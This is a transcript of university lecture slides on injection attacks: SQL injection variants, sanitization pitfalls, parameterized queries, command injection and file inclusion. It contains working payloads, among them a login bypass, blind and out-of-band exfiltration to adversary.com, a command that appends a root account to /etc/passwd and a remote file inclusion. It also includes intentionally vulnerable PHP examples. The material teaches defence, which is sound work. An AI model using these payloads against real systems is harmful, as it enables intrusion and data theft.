ce441: data and network security - injection attacksce.sharif.edu/~b_momeni/ce441/10-injection.pdf2...
TRANSCRIPT
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
CE441: Data and Network SecurityInjection Attacks
Behnam Momeni, PhD
Department of Computer EngineeringSharif University of Technology
Fall 2019
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 1 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Exploitation Technique: In-band Data Retrieval
Outline
1 SQL InjectionSQLi Exploitation Technique: In-band Data RetrievalSQLi Exploitation Technique: In-band Inferential AttackSQLi Exploitation Technique: Out-of-band Data RetrievalSQLi Countermeasures: Input SanitizationSQLi Countermeasures: Parameterized Query
2 Command Injection
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 2 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Exploitation Technique: In-band Data Retrieval
Injection Attacks
When data items are converted from one format to another format...due to type ambiguityuntrusted inputs might be mixed by trusted inputs
...and change the meaning of the produced outputinjecting new control elements
XSS vulnerabilities were a subset of the injection vulnerabilitiesTrusted control element: “<a href=’/test.html’>...</a>”Untrusted input element: “$_GET[’title’]”
title=<script>alert(’XSS’);</script>When converted to the string format to create HTTP response
...injects new control elements (i.e. the <script>)
1 <?php2 echo "<a href=’/test.html’>$_GET[’title’]</a>";3 ?>
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 3 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Exploitation Technique: In-band Data Retrieval
Structured Query Language (SQL) Injection
SQL allows a web application...the Database client
to communicate with a Database and perform CRUDCreate new records with INSERT commandRead existing records with SELECT commandUpdate existing records with UPDATE commandDelete existing records with DELETE command
Formatted as a string and so vulnerable to type ambiguity issues ifdata inputs are not properly encoded to be distinguished from theSQL keywords
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 4 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Exploitation Technique: In-band Data Retrieval
SQL Injection (SQLi) – Example Vulnerable Code
1 <?php2 $mysqli = new mysqli("localhost", "my_user", "my_password",
"database_name");3 if ($mysqli->connect_errno) {4 printf("Connect failed: %s\n", $mysqli->connect_error);5 exit();6 }7 if ($result = $mysqli->query("SELECT Name FROM City "8 . "WHERE Population < " . $_POST["max_population"])) {9 printf("Query returned %d rows.\n", $result->num_rows);
10 process($result);11 $result->close();12 }13 $mysqli->close();14 ?>
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 5 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Exploitation Technique: In-band Data Retrieval
Basic picture: SQL Injection
12
Victim Server
Victim SQL DB
Attacker
post malicious form
unintended SQL queryreceive valuable data
1
2
3
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 6 / 36
Borrowed from [40442-971:09-web-site-sec.pdf], page 12
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Exploitation Technique: In-band Data Retrieval
15
Example: buggy login page (ASP)
set ok = execute( "SELECT * FROM Users WHERE user=' " & form(“user”) & " ' AND pwd=' " & form(“pwd”) & “ '” );
if not ok.EOF login success else fail;
Is this exploitable?
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 7 / 36
Borrowed from [40442-971:09-web-site-sec.pdf], page 15
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Exploitation Technique: In-band Data Retrieval
Web Server
Web Browser(Client)
DB
Enter Username
& Password
SELECT * FROM Users
WHERE user='me' AND pwd='1234'
Normal Query
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 8 / 36
Borrowed from [40442-971:09-web-site-sec.pdf], page 16
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Exploitation Technique: In-band Data Retrieval
17
Bad inputSuppose user = “ ' or 1=1 -- ” (URL encoded)
Then scripts does: ok = execute( SELECT …
WHERE user= ' ' or 1=1 -- … )
■ The “--” causes rest of line to be ignored.
■ Now ok.EOF is always false and login succeeds.
The bad news: easy login to many sites this way.
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 9 / 36
Borrowed from [40442-971:09-web-site-sec.pdf], page 17
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Exploitation Technique: In-band Data Retrieval
In-band Data Retrieval: Error-based SQL Injection
Improper error-handling allows adversary to observe SQL queryerrors
...observe actual data values
...and learn the query structurebased on the observed errors
e.g. to learn the query structureYou have an error in your SQL syntax near’12345678, 123.04, 0, )’ at line 2.
e.g. to learn the actual data values...compute the actual value in a subqueryand use it in a way to cause an error
SELECT * FROM Users WHERE username=’ali’ ANDEXTRACTVALUE(rand(),CONCAT(0x0a,(the-sub-query)))--
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 10 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Exploitation Technique: In-band Data Retrieval
In-band Data Retrieval: UNION-based SQL Injection
Sometimes, the error message is not shown to userBut the query results are displayed themselves
e.g. player’s scores in a game
Extra information from other tables can be extracted...using a UNION query
1 SELECT lvl, score FROM Scores WHERE player=’ali’2 UNION SELECT username, password FROM Users
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 11 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Exploitation Technique: In-band Data Retrieval
Second-Order SQL Injection
When untrusted user input is stored in the database...by proper escaping and without causing SQL injection...it might be read back and used in yet another SQL query
If developers wrongly trust the data (which is read from database)...it can cause a second-order SQL injection
1 UPDATE Users SET password=’newpassphrase’2 WHERE username=’admin’ AND password=’oldpassphrase’34 UPDATE Users SET password=’newpassphrase’5 WHERE username=’admin’ --’ AND password=’random-password’
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 12 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Exploitation Technique: In-band Data Retrieval
SQLi Is A Functionality Bug Too
A subset of inputs (which corrupt the query ) cannot be used
Image Ref: https://www.xkcd.com/327/
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 13 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Exploitation Technique: In-band Inferential Attack
Outline
1 SQL InjectionSQLi Exploitation Technique: In-band Data RetrievalSQLi Exploitation Technique: In-band Inferential AttackSQLi Exploitation Technique: Out-of-band Data RetrievalSQLi Countermeasures: Input SanitizationSQLi Countermeasures: Parameterized Query
2 Command Injection
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 14 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Exploitation Technique: In-band Inferential Attack
In-band Inferential Attack: Boolean-based
Sometimes, data cannot be retrieved directlyNeither error messages are displayed..nor query results are shown to users
But the rendered page reflects some state read from the databasee.g. when query is not well-formed, a generic error page is showne.g. when query has some non-empty results, a button is enabled
These boolean-based differences (normal page vs. error page)leak a single bit of information about the databaseAlso called a blind SQL injection
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 15 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Exploitation Technique: In-band Inferential Attack
In-band Inferential Attack: Time-based
Sometimes, the state of the database, independent of the SQLinjection, is not reflected in the HTTP response
e.g. a second query blocks/abandons SQL injection resultsAlthough not even a bit of information can be extracted throughthe HTTP response body, the SQL injection can affect the overallresponse time
If a true or false condition is detected in the injected query, it mayrun through a fast or slow path to differentiate two scenarios
1 SELECT * FROM User WHERE username=’admin’2 AND password=’1234’3 OR IF(SUBSTRING(password,1,1)<’h’,SLEEP(2),0)=0 --’
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 16 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Exploitation Technique: Out-of-band Data Retrieval
Outline
1 SQL InjectionSQLi Exploitation Technique: In-band Data RetrievalSQLi Exploitation Technique: In-band Inferential AttackSQLi Exploitation Technique: Out-of-band Data RetrievalSQLi Countermeasures: Input SanitizationSQLi Countermeasures: Parameterized Query
2 Command Injection
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 17 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Exploitation Technique: Out-of-band Data Retrieval
Out-of-band Data Retrieval
Data exfiltration is possible through an independent channele.g. writing into a file which is served by a HTTP servere.g. exporting to a remote server directlye.g. loading data & leaking some data through the URLe.g. leaking data through a DNS request
Significantly speeds up the exfiltration process (in comparison toblind scenarios)
but requires FILE privilege which might be unavailable
1 SELECT ’any-data’ INTO OUTFILE ’/var/www/html/data.txt’;2 SELECT ’any-data’ INTO DUMPFILE ’\\\\1.2.3.4\\data.txt’;3 SELECT LOAD_FILE(’\\\\1.2.3.4\\somedata’);4 LOAD DATA INFILE ’\\\\1.2.3.4\\somedata’ INTO TABLE Temp;5 SELECT LOAD_FILE(CONCAT(’\\\\’,6 (some_query_with_one_row_result), ’.adversary.com\\’))
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 18 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Countermeasures: Input Sanitization
Outline
1 SQL InjectionSQLi Exploitation Technique: In-band Data RetrievalSQLi Exploitation Technique: In-band Inferential AttackSQLi Exploitation Technique: Out-of-band Data RetrievalSQLi Countermeasures: Input SanitizationSQLi Countermeasures: Parameterized Query
2 Command Injection
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 19 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Countermeasures: Input Sanitization
SQLi Countermeasures: Input Sanitization (1/3)
The untrusted input might contain SQL keywordsSolution 1: detect and remove SQL keywords
Pitfall:SELINSERTECT → SELECT
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 20 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Countermeasures: Input Sanitization
SQLi Countermeasures: Input Sanitization (1/3)
The untrusted input might contain SQL keywordsSolution 1: detect and remove SQL keywords
Pitfall:SELINSERTECT → SELECT
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 20 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Countermeasures: Input Sanitization
SQLi Countermeasures: Input Sanitization (2/3)
The untrusted input might contain SQL keywordsSolution 2: enclose input in quotations and escape quotations
e.g. username=’1\’ OR 1=1 --’
Pitfall:username=’1\’ OR 1=1 --’
→ username=’1\\’ OR 1=1 --’
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 21 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Countermeasures: Input Sanitization
SQLi Countermeasures: Input Sanitization (2/3)
The untrusted input might contain SQL keywordsSolution 2: enclose input in quotations and escape quotations
e.g. username=’1\’ OR 1=1 --’
Pitfall:username=’1\’ OR 1=1 --’
→ username=’1\\’ OR 1=1 --’
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 21 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Countermeasures: Input Sanitization
SQLi Countermeasures: Input Sanitization (3/3)
The untrusted input might contain SQL keywordsSolution 3: use a library to properly escape quotations
1 <?php2 $username = addslashes("’ OR 1=1 --");3 $query = "... username=’".$username."’ AND ...";4 ?>
Pitfall: Encoding Attacks!
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 22 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Countermeasures: Input Sanitization
SQLi Countermeasures: Input Sanitization (3/3)
The untrusted input might contain SQL keywordsSolution 3: use a library to properly escape quotations
1 <?php2 $username = addslashes("’ OR 1=1 --");3 $query = "... username=’".$username."’ AND ...";4 ?>
Pitfall: Encoding Attacks!
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 22 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Countermeasures: Input Sanitization
Encoding Attacks: The Homoglyphs Feature!
The Microsoft SQL Server supports Unicode characterse.g. the NVARCHAR and NCHAR types or N’strings’
During implicit or explicit conversion from a Unicode type to anon-Unicode type, SQL Server automatically replaces characterswith their most visually similar counterparts (i.e. homoglyphs) inthe target character set
1 # http : / / sql f iddle .com/#!18/9eecb/635752 SELECT CAST(N 'ŚℇℒℇℂƮʼ ' AS nchar) AS UnicodeChar ,3 CAST(N 'ŚℇℒℇℂƮʼ ' AS char) AS NonUnicodeChar
UnicodeChar NonUnicodeCharŚℇℒℇℂƮʼ SELECT'
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 23 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Countermeasures: Input Sanitization
Encoding Attacks: Non-Shortest Form UTF-8
UTF-8 characters use a variable-length codingOne byte for common latin charactersTwo bytes for most of the other languagesLonger codes for rare symbols including emoji characters (U+263A)
It is possible to encode any one-byte character using a two-bytecharacter too, but it is illegal to use these non-shortest forms
The single-quote character is represented as 39 (0x27)...it can also be represented as 0xC0A7
The addslashes function scans for 0x27 bytesSolution: mysqli_real_escape_string
#CodepointBits
First ValidCodepoint
Last ValidCodepoint
Byte 1 Byte 2 Byte 3 Byte 4
7 U+0000 U+007F 0xxx xxxx unused unused unused11 U+0080 U+07FF 110x xxxx 10xx xxxx unused unused16 U+0800 U+FFFF 1110 xxxx 10xx xxxx 10xx xxxx unused21 U+10000 U+10FFFF 1111 0xxx 10xx xxxx 10xx xxxx 10xx xxxx
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 24 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Countermeasures: Input Sanitization
Encoding Attacks: Consuming Escape Characters
In Asian encodings such as Guojia Biaozhun Kuozhan (GBK), anstandard for the simplified Chinese characters, a valid multi-bytecharacter might have the escape character as a suffix
0xBF0x27 (where 0x27 represents a single-quote in ASCII) mightbe escaped by adding a backslash which is represented by 0x5C inASCII
→ 0xBF0x5C27But 0xBF5C is a valid Chinese character in GBK...→ 0xBF5C0x27 (non-escaped single-quote)
In UTF-8, no multi-byte character might be terminated by 0x5CHowever, a wrong implementation might consume extra invalidbytes (0xC0 byte indicates a character with two bytes which mightconsume the following 0x5C; even though it is less than 0x80)
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 25 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Countermeasures: Parameterized Query
Outline
1 SQL InjectionSQLi Exploitation Technique: In-band Data RetrievalSQLi Exploitation Technique: In-band Inferential AttackSQLi Exploitation Technique: Out-of-band Data RetrievalSQLi Countermeasures: Input SanitizationSQLi Countermeasures: Parameterized Query
2 Command Injection
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 26 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
SQL Injection SQLi Countermeasures: Parameterized Query
SQLi Countermeasures: Parameterized Query
Root cause of SQL injection vulnerabilities was the type ambiguityIt can be fixed by not mixing the query and user inputsInputs are passed separately as parametersQuery is prepared beforehand and can be reused
...(re)executed with a set of parameter values
1 <?php2 $stmt = mysqli_prepare($link, "SELECT username FROM Users
WHERE username=? AND password=?");3 mysqli_stmt_bind_param($stmt, ’ss’, $username, $password);4 $username = $_POST[’usr’]; // variables are linked5 $password = $_POST[’pwd’]; // by reference6 mysqli_stmt_execute($stmt);7 mysqli_stmt_bind_result($stmt, $res_username);8 while (mysqli_stmt_fetch($stmt)) {9 printf("%s\n", $res_username);
10 }11 mysqli_stmt_close($stmt);12 ?>
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 27 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Command Injection Remote Code Execution (RCE)
Outline
1 SQL Injection
2 Command InjectionRemote Code Execution (RCE)File Inclusion
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 28 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Command Injection Remote Code Execution (RCE)
Remote Code Execution (RCE)
Dynamic evaluation of untrusted user inpute.g. a calculator...requires careful input sanitization to prevent code execution
1 <?php2 $f = $_GET[’formula’]; // 2+3*43 eval("\$f = $f;");4 echo "Result: $f";5 ?>
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 29 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Command Injection Remote Code Execution (RCE)
Code injection using system()
Example: PHP server-side code for sending email
Attacker can post
OR
$email = $_POST[“email”] $subject = $_POST[“subject”] system(“mail $email –s $subject < /tmp/joinmynetwork”)
http://yourdomain.com/mail.php? [email protected] & subject=foo < /usr/passwd; ls
http://yourdomain.com/mail.php? [email protected]&subject=foo; echo “evil::0:0:root:/:/bin/sh">>/etc/passwd; ls
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 30 / 36
Borrowed from [40442-971:09-web-site-sec.pdf], page 9
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Command Injection File Inclusion
Outline
1 SQL Injection
2 Command InjectionRemote Code Execution (RCE)File Inclusion
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 31 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Command Injection File Inclusion
Local File Inclusion (LFI)
Server-side script might run a sub-script based on user inputThe sub-script is locally present in the server
Adversary might be able to choose & run unexpected scriptse.g. some script from another folder (directory traversal)e.g. some text file which was uploaded by adversary beforehand
1 <?php2 include("subroutines/" . $_GET[’routine_name’]);3 // ../../private/authorized/backend.php4 // ../upload/evilshell.txt5 ?>
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 32 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Command Injection File Inclusion
LFI Countermeasure
Do not pass user input into the file inclusion constructsBut check the user input and use some constant string based on it
Suboptimal solutions:limit the file extensionmitigate relative paths
1 <?php2 if ($_GET[’routine_name’] === ’register’) {3 include("subroutines/register.php");4 } elseif ($_GET[’routine_name’] === ’greet’) {5 include("subroutines/greetings.php");6 } else {7 die("bad routine name");8 }9 ?>
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 33 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Command Injection File Inclusion
Obtaining Source Files Using LFI
If adversary can select arbitrary schemes for an LFI caseOne possible selection would be to enable PHP filtersRef: https://www.php.net/manual/en/filters.php
For example,http://example.com/index.php?f=php://filter/convert.base64-encode/resource=index
...the index.php resource will be base64-encoded and returned
1 <?php2 include($_GET[’f’] . ".php");3 ?>
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 34 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Command Injection File Inclusion
Remote File Inclusion (RFI)
When no prefix is used while specifying the included file URI,adversary can use any scheme and include remote files too
In PHP, the allow_url_include should be on for RFI to work
Remote (hosted) script is downloaded and executed by the server
1 <?php2 include($_GET[’routine_name’] . ".php");3 // http://adversary.com/evil4 ?>
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 35 / 36
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
References and Further Reading Bibliography
References and Further Reading
[40442-971:09-web-site-sec.pdf] Mehdi Kharrazi, “CE 442/Computer and NetworkSecurity – Lecture 9 - Web Application Security,” Sharif University of Technology, Online:http://sharif.edu/~kharrazi/courses/40442-971/09-web-site-sec.pdf, 2018
[homogplyphs-injection] Bert Wagner, “ʼ;ŚℇℒℇℂƮ *: How Unicode Homoglyphs WillBreak Your Custom SQL Injection Sanitizing Functions,” HackerNoon, Online: http://hackernoon.storage.googleapis.com/%CA%BC-%C5%9B%E2%84%87%E2%84%92%E2%84%87%E2%84%82%CA%
88-how-unicode-homoglyphs-will-break-your-custom-sql-injection-sanitizing-functions-1224377f7b51,2017
[overlong-utf8] Eduardo Vela, “A couple of unicode issues on PHP and Firefox,”SirDarckCat Blog, Online:http://sirdarckcat.blogspot.com/2009/10/couple-of-unicode-issues-on-php-and.html, 2009
[consuming-utf8-bytes] Chris Shiflett, “addslashes() Versus mysql_real_escape_string(),”Shiflett Blog, Online:http://shiflett.org/blog/2006/addslashes-versus-mysql-real-escape-string, 2006
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 36 / 36